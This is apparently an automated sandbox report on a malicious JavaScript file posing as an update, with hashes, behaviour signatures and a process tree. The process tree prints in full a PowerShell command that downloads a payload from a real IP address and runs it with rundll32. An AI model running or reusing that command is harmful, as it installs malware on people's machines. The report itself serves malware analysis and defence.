Resubmissions
15-08-2024 20:42
240815-zhg3jaxglr 1014-06-2024 12:05
240614-n89dxszekb 1028-05-2024 22:27
240528-2dhvdagb62 10Analysis
-
max time kernel
147s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
14-06-2024 12:05
Static task
static1
Behavioral task
behavioral1
Sample
Update_25_04_2024_3146918.js
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
Update_25_04_2024_3146918.js
Resource
win10v2004-20240508-en
General
-
Target
Update_25_04_2024_3146918.js
-
Size
135KB
-
MD5
bf7f711e823916e5f56ff4d2286ee866
-
SHA1
d9c9d093ce5f1cbc78280ab0232b5d6ef8c25729
-
SHA256
0c9697506df18baac4b4215e78a43926ea4bb94ea3607c851a1c2fe3b5b31f17
-
SHA512
842616018719df7c6ee7cac5996ea1399a2a459353ee96de2bf9fda122aac861baa0a5c848dad1d4aa756fab897d1e7a978eac359458d52801020685db67d941
-
SSDEEP
1536:XDOApMn1gDmN2yBCn/yA3seAeLCMamLcInL1VXJ3Duvnr:6A+n1gDmNnw/yA3slMamLcInL7tDuvr
Malware Config
Extracted
http://185.49.69.41/data/d291855f9fd1c934f7c97a4d2ba99b89
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
pid Process 3500 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2396 powershell.exe 2396 powershell.exe 3500 powershell.exe 3500 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2396 powershell.exe Token: SeDebugPrivilege 3500 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 1664 wrote to memory of 2396 1664 wscript.exe 87 PID 1664 wrote to memory of 2396 1664 wscript.exe 87 PID 2396 wrote to memory of 3500 2396 powershell.exe 89 PID 2396 wrote to memory of 3500 2396 powershell.exe 89
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\Update_25_04_2024_3146918.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1664 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -c "start-job { param($a) Import-Module BitsTransfer; $d = $env:temp + '\' + [System.IO.Path]::GetRandomFileName(); Start-BitsTransfer -Source 'http://185.49.69.41/data/d291855f9fd1c934f7c97a4d2ba99b89' -Destination $d; if (![System.IO.File]::Exists($d)) {exit}; $p = $d + ',Start'; rundll32.exe $p; Start-Sleep -Seconds 10} -Argument 0 | wait-job | Receive-Job"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2396 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3500
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82